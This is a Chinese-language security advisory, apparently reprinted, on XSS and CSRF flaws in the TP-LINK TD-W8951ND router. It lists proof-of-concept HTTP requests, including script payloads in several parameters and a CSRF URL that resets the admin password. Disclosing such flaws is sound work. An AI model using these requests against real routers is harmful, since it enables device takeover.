W8951ND Router 跨站脚本和请求伪造漏洞

发布日期:2013-09-05
更新日期:2013-09-07

受影响系统:
TP-LINK TD-W8951ND 4.0.0 Build 120607 Rel.30923
描述:
--------------------------------------------------------------------------------
TD-W8951ND是款无线路由器产品。

TD-W8951ND 4.0.0 Build 120607 Rel.30923存在多个漏洞,远程攻击者可利用这些漏洞执行跨站脚本和请求伪造攻击。这些漏洞源于/Forms/home_wlan_1内的"wlanWEBFlag", "AccessFlag", "wlan_APenable"参数值,及/Forms/tools_test_1内的"PingIPAddr" POST参数值,导致在用户浏览器中执行任意HTML和脚本代码;以及源于没有正确验证某些HTTP请求。

<*来源:xistence (xistence@0x90.nl)
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url
pages ]

GET /doesnotexist HTTP/1.1
Host: <IP>
Referer: "><script>alert("XSS")</script>
Connection: keep-alive


[ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ]


<IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

<IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

<IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E


[ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1"
argument "PingIPAddr" ]

POST /Forms/tools_test_1 HTTP/1.1
Host: <IP>
Referer: <IP>/maintenance/tools_test.htm
Authorization: Basic blablabla==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+


[ 0x04 - Reset Admin password CSRF ]


<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED

建议:
--------------------------------------------------------------------------------
厂商补丁:

TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/f4644cb26b4cf050764d18fb20bcc464.html